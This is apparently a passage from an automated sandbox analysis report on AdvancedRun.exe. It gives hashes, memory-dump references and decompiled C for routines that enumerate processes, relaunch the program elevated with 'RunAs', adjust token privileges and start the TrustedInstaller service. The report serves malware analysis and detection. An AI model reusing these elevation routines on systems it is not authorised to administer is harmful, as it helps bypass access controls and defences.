Opcode Fuzzy Hash: 084c507dee2af916fac14a5cae05c04ff3b3141451ed03164a391e2435583af0
Instruction Fuzzy Hash: 0E01406140D3C45FD7138B259C94752BFA8EF43624F0D81DBE9858F297C2695C45C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 034DD01D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.940919896.00000000034DD000.00000040.00000001.sdmp, Offset: 034DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81bee60605ccfef61bd7ca2ca169228452f0adfb4d261bea1ca83266d66da811
Instruction ID: 23751ea3e7bf2e52bebb5686be3a016192b2fe103cc155bfa5b81410a91750cb
Opcode Fuzzy Hash: 81bee60605ccfef61bd7ca2ca169228452f0adfb4d261bea1ca83266d66da811
Instruction Fuzzy Hash: 9201F271808340AAE7118E25EC84B67FBD8EF8322CF08C05BED155F286C3B99946C6F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: AdvancedRun.exe PID: 5956 Parent PID: 7164 AdvancedRun.exeCOMMON

Executed Functions

Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

0x00409609
0x0040960f
0x00409619
0x00409623
0x0040962e
0x00409633
0x00409640
0x0040964a
0x00409782
0x0040978c
0x00409793
0x00000000
0x00000000
0x0040965a
0x0040965f
0x00409678
0x0040967e
0x00409681
0x00409685
0x00409688
0x004096b2
0x004096bf
0x004096c6
0x004096cb
0x004096da
0x004096e6
0x0040973b
0x00409747
0x0040975f
0x00409764
0x0040976a
0x00409770
0x00409773
0x0040977d
0x00000000
0x0040977d
0x004096ee
0x004096f5
0x004096fc
0x00409704
0x0040970c
0x0040971c
0x0040971c
0x00409704
0x00409721
0x00409728
0x00409739
0x00409739
0x00000000
0x00409728
0x00409693
0x00000000
0x00000000
0x004096a5
0x004096a9
0x004096ac
0x00000000
0x00000000
0x00000000
0x004096ac
0x004097a6

APIs

Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB

CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
memset.MSVCRT ref: 0040962E
Process32FirstW.KERNEL32(?,?), ref: 0040964A
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
memset.MSVCRT ref: 004096C6
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Strings

kernel32.dll, xrefs: 004096F7
QueryFullProcessImageNameW, xrefs: 00409706

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1740548384
Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}

0x00401c31
0x00401c33
0x00401c48
0x00401c4f
0x00401c61
0x00401c68
0x00401c74
0x00401c79
0x00401c7a
0x00401c7b
0x00401c84
0x00401c89
0x00401c8e
0x00401c8f
0x00401c9b
0x00401ca6
0x00401caf
0x00401cb9
0x00401cc0
0x00401cc7
0x00401cce
0x00401cd5
0x00401cdd
0x00401ce0
0x00401d14
0x00401ce2
0x00401ce8
0x00401cf3
0x00401cf6
0x00401cfe
0x00401d09
0x00401d09
0x00401cfe
0x00401d1b

APIs

GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
memset.MSVCRT ref: 00401C4F
memset.MSVCRT ref: 00401C68

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00401C8F
memset.MSVCRT ref: 00401C9B
ShellExecuteExW.SHELL32(?), ref: 00401CD5
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
GetExitCodeProcess.KERNELBASE ref: 00401CF6
GetLastError.KERNEL32 ref: 00401D0E

Strings

/SpecialRun %I64x %d, xrefs: 00401C84
RunAs, xrefs: 00401CC0
<, xrefs: 00401CB9
@, xrefs: 00401CC7

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
String ID: /SpecialRun %I64x %d$<$@$RunAs
API String ID: 903100921-3385179869
Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}

0x00408fc9
0x00408fd0
0x00408fe8
0x00000000
0x00408fea
0x00408ff4
0x00409001
0x00409003
0x0040900c
0x0040900e
0x00409010
0x0040901a
0x0040901a
0x00409010
0x0040901f
0x00409026
0x0040902d
0x00409030
0x00409035
0x00409037
0x00409040
0x00409042
0x00409044
0x00409051
0x00409051
0x00409044
0x00409053
0x0040905e
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

GetLastError.KERNEL32(00000000), ref: 00408FEA
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E

Strings

AdjustTokenPrivileges, xrefs: 00409039
LookupPrivilegeValueW, xrefs: 00409005

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
API String ID: 616250965-1253513912
Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}

0x00401319
0x0040131b
0x00401327
0x0040132b
0x0040133a
0x0040134b
0x0040134b
0x0040134e
0x0040134e
0x00401353
0x0040135b

APIs

OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353

Strings

TrustedInstaller, xrefs: 00401311

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$OpenQueryStartStatus
String ID: TrustedInstaller
API String ID: 862991418-565535830
Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

0x0040a348
0x0040a34e
0x0040a352
0x0040a35f
0x0040a363
0x0040a369
0x0040a371
0x0040a374
0x0040a37c
0x0040a380
0x0040a383
0x0040a386
0x0040a388
0x0040a388
0x0040a38c
0x0040a38f
0x0040a39f
0x0040a3a1
0x0040a3a5
0x0040a3a5
0x0040a3a9
0x0040a3aa
0x0040a3b3
0x0040a3b3
0x0040a37c
0x0040a371
0x0040a3b8
0x0040a3be

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
SizeofResource.KERNEL32(?,00000000), ref: 0040A359
LoadResource.KERNEL32(?,00000000), ref: 0040A369
LockResource.KERNEL32(00000000), ref: 0040A374

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88

Uniqueness

Uniqueness Score: -1.00%

Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

0x004022d5
0x004022dd
0x004022e7
0x004022ec
0x004022f7
0x004022fa
0x004022fd
0x00402300
0x00402307
0x0040230d
0x0040230e
0x00402318
0x00402321
0x00402324
0x00402327
0x0040232a
0x0040232d
0x00402334
0x00402337
0x0040233e
0x0040234f
0x00402356
0x0040235b
0x0040235e
0x0040236d
0x00402374
0x0040237e
0x00402395
0x004023a0
0x004023a0
0x004023ac
0x004023cf
0x004023d2
0x004023d9
0x004023de
0x004023f6
0x00402403
0x00402414
0x00402419
0x00402403
0x0040241a
0x00402423
0x00402458
0x0040245d
0x00402464
0x00402467
0x00402468
0x00000000
0x00000000
0x00000000
0x00402425
0x00402428
0x0040242b
0x00402433
0x00402434
0x00402473
0x00402473
0x0040247c
0x00402481
0x00402488
0x00402488
0x00402495
0x0040249a
0x004024b7
0x004024be
0x004024cd
0x004024d1
0x004024ed
0x004024f0
0x00402506
0x0040250b
0x00402512
0x00402518
0x00402519
0x0040251e
0x00402524
0x00402527
0x0040252b
0x00402530
0x00402531
0x00402531
0x0040253d
0x0040255a
0x00402561
0x00402570
0x00402574
0x00402590
0x00402593
0x004025a9
0x004025ae
0x004025b5
0x004025bb
0x004025bc
0x004025c1
0x004025c7
0x004025ca
0x004025cd
0x004025ce
0x004025d4
0x004025d4
0x004025da
0x004025e3
0x004025eb
0x00402633
0x004025fb
0x00402608
0x0040260f
0x00402614
0x00402624
0x00402630
0x00402630
0x0040263a
0x0040263b
0x00402646
0x0040264b
0x0040264c
0x0040265a
0x0040265a
0x0040265d
0x00402666
0x00402668
0x00402668
0x00402672
0x00402675
0x0040267e
0x0040267e
0x00402683
0x0040268b
0x0040269e
0x0040269e
0x004026a3
0x004026ac
0x004026b5
0x004026b8
0x00000000
0x00000000
0x004026ba
0x00000000
0x004026ae
0x004026ae
0x004026bf
0x004026c1
0x004026c6
0x004026cc
0x004026d5
0x004026db
0x004026e4
0x004026ea
0x004026f3
0x004026f9
0x00402707
0x00402707
0x0040270d
0x00402710
0x0040276d
0x00402770
0x0040280b
0x0040280e
0x00402813
0x00402810
0x00402810
0x00402810
0x00402819
0x0040281f
0x00402836
0x00402841
0x00402846
0x0040284a
0x00402851
0x00402857
0x00402860
0x00402865
0x00402876
0x00402879
0x00402888
0x00402888
0x00402857
0x00402891
0x0040289c
0x0040289c
0x00402779
